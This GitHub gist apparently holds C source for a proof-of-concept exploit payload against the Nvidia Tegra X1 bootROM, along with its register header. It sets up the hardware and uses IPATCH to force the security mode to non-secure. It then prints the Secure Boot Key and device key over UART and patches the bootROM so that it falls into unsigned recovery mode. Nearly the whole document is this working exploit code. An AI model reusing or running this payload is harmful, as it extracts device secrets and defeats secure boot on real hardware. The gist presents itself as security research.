Skip to content

Instantly share code, notes, and snippets.

@ktemkin
Last active September 9, 2024 21:55
Show Gist options
  • Save ktemkin/825d5f4316f63a7c11ea851a2022415a to your computer and use it in GitHub Desktop.
Save ktemkin/825d5f4316f63a7c11ea851a2022415a to your computer and use it in GitHub Desktop.
/**
* Proof of Concept Payload
* prints out SBK and then enables non-secure RCM
*
* (some code based on coreboot)
* ~ktemkin
*/
#include <stdint.h>
#include "registers.h"
#include "t210.h"
#define HEX_CHAR(x) ((((x) + '0') > '9') ? ((x) + '7') : ((x) + '0'))
// Address of the bootrom immediately after it applies ipatches to itself.
#define BOOTROM_START_POST_IPATCH 0x101010
// Set this to 3 to disable _all_ security.
// Set this to 5 if you want to use the SBK only.
// (This is useful if you want to use the standard downstream stack,
// which will itself read the SBK from fuses to ensure everything's kosher.)
#define DESIRED_SECURITY_MODE 3
// General next-stage image entry point type.
typedef void (*entry_point)(void);
/**
* We yank execution from the bootROM in the middle of some initialization, leaving it in
* a state that may not be entireliy defined. (This payload's used for multiple exploits.)
*
* We'll provide some functionality to get it into a stable state
* so we can execute things.
*/
/**
* Set up the Tegra CLK_M, allowing us to use peripherals from
* mid-bootrom configuration.
*/
static void set_clk_m(void)
{
uint32_t spare;
/* set clk_m frequency to 19.2MHz: set divisor to 2. */
spare = reg_read(CAR_BASE, 0x55c);
spare &= ~CLK_M_DIVISOR_MASK;
spare |= CLK_M_DIVISOR_BY_2;
reg_write(CAR_BASE, 0x55c, spare);
/*
* Restore TIMERUS config for 19.2MHz. (19.2 = 96/5 = 0x60/5)
* USEC_DIVIDEND(15:8) = 5-1; USEC_DIVISOR(7:0) = 0x60-1
*/
reg_write(TIMER_BASE, 0x14, 0x045f);
}
/**
* Delays for the specified number of microseconds
*
* @parma usecs The microseconds to delay.
*/
static void udelay(unsigned usecs)
{
uint32_t start = reg_read(TIMER_BASE, 0x10);
while (reg_read(TIMER_BASE, 0x10) - start < usecs) ;
}
/**
* Configures the Tegra MSELECT to resume from the bootrom.
*/
static void config_mselect(void)
{
/* Set MSELECT clock source to PLL_P with 1:4 divider */
reg_write(CAR_BASE, 0x3b4, (CLK_SRC_PLLP_OUT0 | MSELECT_CLK_DIVISOR_4));
/* Enable clock to MSELECT */
reg_write(CAR_BASE, 0x440, CLK_ENB_MSELECT);
/* Bring MSELECT out of reset, after 2 microsecond wait */
udelay(2);
reg_write(CAR_BASE, 0x434, MSELECT_RST);
}
/**
* Set up the main system oscillator, again, just in case.
*/
static void config_oscillator(void)
{
/*
* Read oscillator drive strength from OSC_EDPD_OVER.XOFS and copy
* to OSC_CTRL.XOFS and set XOE.
*/
uint32_t xofs = (reg_read(PMC_BASE, 0x1a4) &
PMC_XOFS_MASK) >> PMC_XOFS_SHIFT;
uint32_t osc_ctrl = reg_read(CAR_BASE, 0x50);
osc_ctrl &= ~OSC_XOFS_MASK;
osc_ctrl |= (xofs << OSC_XOFS_SHIFT);
osc_ctrl |= OSC_XOE;
reg_write(CAR_BASE, 0x50, osc_ctrl);
}
/**
* Enable getting debug output on UART-A, e.g. via the Suzy-Qu debug adapter.
*/
static void enable_uart(void)
{
/* set pinmux for UARTA */
reg_write(PINMUX_BASE, 0xe4, 0b0001000);
/* ensure the UART's not in deep power down */
reg_clear(PMC_BASE, 0x1b8, (1 << 14));
/* Enable UART clock */
reg_set(CAR_BASE, 0x10, UARTA_CAR_MASK);
/* Reset and unreset UART */
reg_set( CAR_BASE, 0x04, UARTA_CAR_MASK);
reg_clear(CAR_BASE, 0x04, UARTA_CAR_MASK);
/* Program UART clock source: PLLP (408000000) */
reg_write(CAR_BASE, 0x178, 0);
/* Program 115200n8 to the uart port */
/* baud-rate of 115200 */
reg_set( UARTA_BASE, UART_LCR, LCR_DLAB);
reg_write(UARTA_BASE, UART_THR_DLAB, (UART_RATE_115200 & 0xff));
reg_write(UARTA_BASE, UART_IER_DLAB, (UART_RATE_115200 >> 8));
reg_clear(UARTA_BASE, UART_LCR, LCR_DLAB);
/* 8-bit and no parity */
reg_write(UARTA_BASE, UART_LCR, LCR_WD_SIZE_8);
/* ensure the TX and RX fifos are up */
reg_write(UARTA_BASE, UART_IIR_FCR, 0);
}
/**
* Returns true iff we can populate a new character into the UART
* transmit buffer.
*/
int uart_buffer_available()
{
uint32_t holding_reg = reg_read(UARTA_BASE, UART_LSR);
return ((holding_reg >> 5) & 0x01);
}
/**
* Prints a single character (synchronously) via serial.
*
* @param c The character to be printed
*/
void putc(char c)
{
// If we're about to send a newline, prefix it with a carriage return.
// This makes our putc behave like a normal console putc.
if(c == '\n')
putc('\r');
// Wait for the holding register to become available.
while(!uart_buffer_available());
// Stick data in the holding register...
reg_write(UARTA_BASE, UART_THR_DLAB, c);
}
/** send an 8 bit byte as two hex characters to the console */
static void dump_byte(uint8_t b)
{
putc(HEX_CHAR((b >> 4) & 0xf));
putc(HEX_CHAR(b & 0xf));
}
/** prints a word */
static void dump_word(uint32_t w)
{
dump_byte(w & 0xff);
dump_byte(w >> 8);
}
/** print a dword */
static void dump_dword(uint32_t d)
{
dump_word(d & 0xffff);
dump_word(d >> 16);
}
/**
* Prints a string (synchronously) via serial.
*
* @param s The string to be printed; must be null terminated.
*/
extern int puts(const char * s)
{
while(*s) {
putc(*s);
++s;
}
return 0;
}
/**
* Attempts to restore the system to a usable state from an interruption
* anywhere in the bootrom.
*/
void set_up_system()
{
config_oscillator();
set_clk_m();
// Program SUPER_CCLK_DIVIDER.
reg_write(CAR_BASE, 0x36c, SUPER_CDIV_ENB);
reg_write(CAR_BASE, 0x374, SUPER_CDIV_ENB);
config_mselect();
enable_uart();
}
/**
* Patches over a given address in the IROM using the IPATCH hardware.
*/
void ipatch_word(uint8_t slot, uint32_t addr, uint16_t new_value)
{
uint32_t slot_value;
uint32_t offset;
// Mark the relevant ipatch slot as not-in-use.
reg_clear(IPATCH_BASE, IPATCH_SELECT, (1 << slot));
// Compute the new patch value.
offset = (addr & 0xFFFF) >> 1;
slot_value = (offset << 16) | new_value;
// Figure out the location of the slot to touch.
reg_write(IPATCH_BASE, IPATCH_REGS + (slot * 4), slot_value);
// Apply the new one.
reg_set(IPATCH_BASE, IPATCH_SELECT, (1 << slot));
}
/**
* Disables a given ipatch.
*/
void unipatch_word(uint8_t slot)
{
// Mark the relevant ipatch slot as not-in-use.
reg_clear(IPATCH_BASE, IPATCH_SELECT, (1 << slot));
}
/**
* Example exploit payload; printks the SBK and enables unsigned RCM.
*/
void main()
{
entry_point start;
set_up_system();
// Say hello.
puts("Hello from the early X1 bootROM!\n");
puts("Attempting to patch over the IROM itself.\n");
// Patch the getSecurityMode function to always return 3 (production non-secure).
ipatch_word(10, 0x102050, 0x2000 | DESIRED_SECURITY_MODE);
// Jump into the recovery mode routine.
puts("I'm going to go ahead and run RCM for you with security off. Have fun. :)\n");
puts("For reference, your SBK+DK are: ");
for(int i = 0; i < 5; ++i) {
dump_dword(reg_read(FUSE_CACHE_SBK_BASE, i * 4));
}
puts("\n");
// Clear bit0 to indicate that this is a fresh boot, and then set bit2 to trigger RCM.
reg_write(PMC_BASE, PMC_SCRATCH0, (1 << 2));
// Patch to skip readBctEtc so we always fall back into RCM. :)
ipatch_word(11, 0x101E1C, 0x4770);
// Jump back into the bootloader immediately after ipatches are applied
// to simualte a normal coldboot as best we can. :)
start = (entry_point)BOOTROM_START_POST_IPATCH;
start();
}
#ifndef _T210_H_
#define _T210_H_
// FIXME: make these enums, like the ones below
/* Microseoncd timer base address. */
#define TIMER_BASE (0x60005000)
#define TEGRA_TMRUS (0x60005010UL)
/* Power management controller base address and offsets. */
#define PMC_BASE (0x7000e400UL)
#define PMC_CONTROL (0x0)
#define PMC_CONTROL_MAIN_RESET (1 << 4)
#define PMC_SCRATCH0 (0x50)
#define PMC_SCRATCH0_WARMBOOT (1 << 0)
#define PMC_SCRATCH31 (0x118)
#define PMC_SCRATCH32 (0x11c)
/* Clock and reset controller */
#define CAR_BASE (0x60006000)
/* Pinmux in APB misc */
#define PINMUX_BASE (0x70003000)
/* UARTA */
#define UARTA_BASE (0x70006000)
#define UARTA_CAR_MASK (1 << 6)
/* Fuses */
#define FUSE_BASE (0x7000f800)
#define FUSE_REG_ADDR (0x04)
#define FUSE_REG_READ (0x08)
#define FUSE_CACHE_SBK_BASE (0x7000F9A4)
/* APB misc block */
#define APB_MISC_BASE (0x70000000)
#define APB_MISC_STRAPS (0x8)
/* ipatch hardware */
#define IPATCH_BASE (0x6001dc00)
#define IPATCH_SELECT (0x0)
#define IPATCH_REGS (0x4)
/**
* from coreboot
*/
enum {
PMC_XOFS_SHIFT = 1,
PMC_XOFS_MASK = 0x3f << PMC_XOFS_SHIFT
};
enum {
OSC_XOE = 0x1 << 0,
OSC_XOFS_SHIFT = 4,
OSC_XOFS_MASK = 0x3f << OSC_XOFS_SHIFT,
OSC_FREQ_SHIFT = 28,
OSC_FREQ_MASK = 0xf << OSC_FREQ_SHIFT
};
enum {
CLK_M_DIVISOR_MASK = 0x3 << 2,
CLK_M_DIVISOR_BY_2 = 0x1 << 2
};
enum {
UART_THR_DLAB = 0x00,
UART_IER_DLAB = 0x04,
UART_IIR_FCR = 0x08,
UART_LCR = 0x0C,
UART_LSR = 0x14
};
enum {
UART_RATE_115200 = (408000000/115200/16), /* based on 408000000 PLLP */
FCR_TX_CLR = 0x4, /* bit 2 of FCR : clear TX FIFO */
FCR_RX_CLR = 0x2, /* bit 1 of FCR : clear RX FIFO */
FCR_EN_FIFO = 0x1, /* bit 0 of FCR : enable TX & RX FIFO */
LCR_DLAB = 0x80, /* bit 7 of LCR : Divisor Latch Access Bit */
LCR_WD_SIZE_8 = 0x3, /* bit 1:0 of LCR : word length of 8 */
};
enum {
CLK_SRC_PLLP_OUT0 = (0x0 << 29),
MSELECT_CLK_DIVISOR_4 = 6
};
enum {
CLK_ENB_MSELECT = 0x1 << 3
};
enum {
MSELECT_RST = 0x1 << 3
};
enum {
SUPER_CDIV_ENB = 0x1 << 31
};
#endif
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment